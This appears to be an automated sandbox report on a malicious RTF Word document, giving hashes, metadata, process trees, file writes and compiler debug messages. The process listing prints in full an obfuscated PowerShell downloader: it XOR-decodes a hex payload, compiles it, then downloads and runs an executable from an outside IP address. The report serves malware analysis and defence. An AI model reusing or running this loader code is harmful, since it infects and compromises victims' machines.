File name: | f5229d97f733e858cec79e26a3b58ae2.doc |
Full analysis: | https://app.any.run/tasks/400d9f14-e995-4a37-b3fa-ac66ae28263a |
Verdict: | Malicious activity |
Analysis date: | February 19, 2019, 08:33:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | F5229D97F733E858CEC79E26A3B58AE2 |
SHA1: | 74350F16BD71BE98D29189532D06A62F1CBC3E60 |
SHA256: | 4E90CB9F4536BD2A1E79DCC42F757DFB22BD7110F54B2B1C41AA114637C9593C |
SSDEEP: | 1536:oZdHt5ieI52b1bFCu6hYlDOyb1t5ieI52b1bFCu6hYlDOyb1t5ieI52b1bFCu6hu:oHk5IU5IU5IU5IU5IpV7 |
.rtf | | | Rich Text Format (100) |
---|
Author: | Admin |
---|---|
LastModifiedBy: | Admin |
CreateDate: | 2019:01:07 23:54:00 |
ModifyDate: | 2019:01:07 23:54:00 |
RevisionNumber: | 1 |
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 4 |
CharactersWithSpaces: | 4 |
InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2992 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f5229d97f733e858cec79e26a3b58ae2.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3836 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3236 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function kb8cf { param($cca8c7) $kabe8 = 'd1c687'; $u7fd21c = ''; for ($i = 0; $i -lt $cca8c7.length; $i+=2) { $v1f4587 = [convert]::ToByte($cca8c7.Substring($i, 2), 16); $u7fd21c += [char]($v1f4587 -bxor $kabe8[($i / 2) % $kabe8.length]); } return $u7fd21c; } $r13b = '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'; $r13b2 = kb8cf($r13b); Add-Type -TypeDefinition $r13b2; [a1a5d7]::x947a(); Start-Sleep -s 1; $re5963f = $env:APPDATA; $u2cbc1 = $re5963f + '\\ec449.exe'; If (test-path $u2cbc1) {Remove-Item $u2cbc1}; $ed74b = New-Object System.Net.WebClient; $ed74b.Headers['User-Agent'] = 'ed74b'; $ed74b.DownloadFile('http://http://139.99.186.18:80/xml/new.exe', $u2cbc1); Start-Process -Filepath $u2cbc1; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2208 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\s5hzlapt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3440 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES7CB3.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7CB2.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3760 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2240 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function kb8cf { param($cca8c7) $kabe8 = 'd1c687'; $u7fd21c = ''; for ($i = 0; $i -lt $cca8c7.length; $i+=2) { $v1f4587 = [convert]::ToByte($cca8c7.Substring($i, 2), 16); $u7fd21c += [char]($v1f4587 -bxor $kabe8[($i / 2) % $kabe8.length]); } return $u7fd21c; } $r13b = '11420a585f17374810425d5a5f3c69434b5e0a564365414410540e186a420a450a5b5d192d5f17534a58146206444e5e0754100d353d1444015a515444520f574b44445052570d53533c694d353d44114316181744113872545b2d5c13594a434c1308534a59015d50041a1e393c6916181744114316184711530f5f5b1717450242515444541b425d450a112a584c67104343715d4334430c557953004306454b1f2d5f17664c4544592e595c4208544f164b4316580d511847165e0078595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944780d42684316112f5959532858014459451d1910424a5e0a564358595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944530c595417325811424d56086111594c5207454b7f5643344511165447255507445d44171d4363715910611744185313620a4c5d1b44440a584c17025d2d534f67165e17535b4348110c434c1711580d42185b14570f79545334430c425d541018583b3217441143161817446a275a547e09410c444c1f467a06445652080251185c5b08134f167d5910431a66575e0a45430b181536450f7b5741017c065b57451d134f166b52107d02454c7216430c44180a4457025a4b524d6c6e3c181744114316181717450242515444541b425d450a1115595153447c0c405d7a015c0c44411f2d5f17664c45445506454c1b44780d426843161110445b1b44580d4218440d4b061f033a6e3c6916181744114316184711530f5f5b1717450242515444580d42184f5d055457101e693b4316181744114316433a6e114316181744114316181744780d42684316111b550003520005160517285e0252745e06430244411f0f535b555e1f460156035b06540405070e0257015b035c154d18583b321744114316181744114316185e02114b4e5b0f50075250180a59112a584c6710434d6c5d450b186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617
550a6e3c181744114316181744114316453a6e3c691618174411431618174411437f5643344511164256050857160517235417664a58077007524a5217424b4e5b0f5007525014170f535b555e1f460356035b06540405005a02500156035e05550550035d02550152020b154d18583b321744114316181744114316185e02114b4c59565d05430b05172d5f17664c454a6b0644571e693b431618174411431618174411183b3217441143161817441143161817441143445d4311430d16090c693b4316181744114316181744111e3b323a6e114316181744114316181744642a584c67104343524f640d4b061605174c642a584c6710434a03033a6e114316181744114316181744440a584c173e541159180a4401583b321744114316181744114316185e02114b176e5e164516575467165e17535b434c4b02570103481107416b5e1e544f16084f50014f165742101139534a584d186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e114316181744114316181744731a425d6c391133574c540c115e16431754495007141754490550141754495a06184a5f3c691618174411431618174411437f5643344511164d5909500d575f5200610c5f56430143430b187a0543105e595b4a700f5a57542c760f595a560819501f033a6e1143161817441143161817447c02444b5f055d4d7557471d1933574c540c1d43061417115f0e57565603540766575e0a45064414175718583b321744114316181744114316187a0b47067b5d5a0b431a1e565213112a584c6710434b4c59565d054d62577e0a455502101e441a430640075400011f1417115f0e57565603540766575e0a45064414175718583b3217441143161817441143161845014516445617540a6e3c1817441143161817193c693f314711530f5f5b17174502425154444217445159031108540054021910424a5e0a5643454c452d5f4a3b3217441143161817444a6e3c313e6d42174451590311160e0b0550085a160517465552550e0f5313583b321744114316181744114316184410430a585f17170951045a17591130424a5e0a564d7355471048583b32174411431618174411431618510b43431e515910110a160517540a435f180b4442174471594a7d06585f430c0a435f181c5911511f353d4411431618174411431618171f3c6916181744114316181744114316181744531a425d171c0350035d0506115e167b580a4706444c19305e214f4c524c42174471594a6216544b4316580d51105e4811511f141755074a0d353d441143161817441143161817441143164b0f56030116130a4419005e59454d191b04
0b02010301166617110950040c0e5d6a4b5f181844034a161d17110950040c0e5d1f2f53565010593e1f033a6e1143161817441143161817444c6e3c353d441143161817441143161817165417434a5944425b040a555f3c6916181744114316184a693b1e'; $r13b2 = kb8cf($r13b); Add-Type -TypeDefinition $r13b2; [a1a5d7]::x947a(); Start-Sleep -s 1; $re5963f = $env:APPDATA; $u2cbc1 = $re5963f + '\\ec449.exe'; If (test-path $u2cbc1) {Remove-Item $u2cbc1}; $ed74b = New-Object System.Net.WebClient; $ed74b.Headers['User-Agent'] = 'ed74b'; $ed74b.DownloadFile('http://http://139.99.186.18:80/xml/new.exe', $u2cbc1); Start-Process -Filepath $u2cbc1; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3308 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\c6x8sxss.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
1812 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES928D.tmp" "c:\Users\admin\AppData\Local\Temp\CSC928C.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2616 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2992 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D22.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3836 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR74B3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3236 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FB2YCXE48AI2AO3D6UCX.temp | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC7CB2.tmp | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\s5hzlapt.pdb | — | |
MD5:— | SHA256:— | |||
3440 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES7CB3.tmp | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\s5hzlapt.dll | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\s5hzlapt.out | — | |
MD5:— | SHA256:— | |||
3760 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D6C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2240 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V319PEQABIZWHQ66FN78.temp | — | |
MD5:— | SHA256:— |
Process | Message |
---|---|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|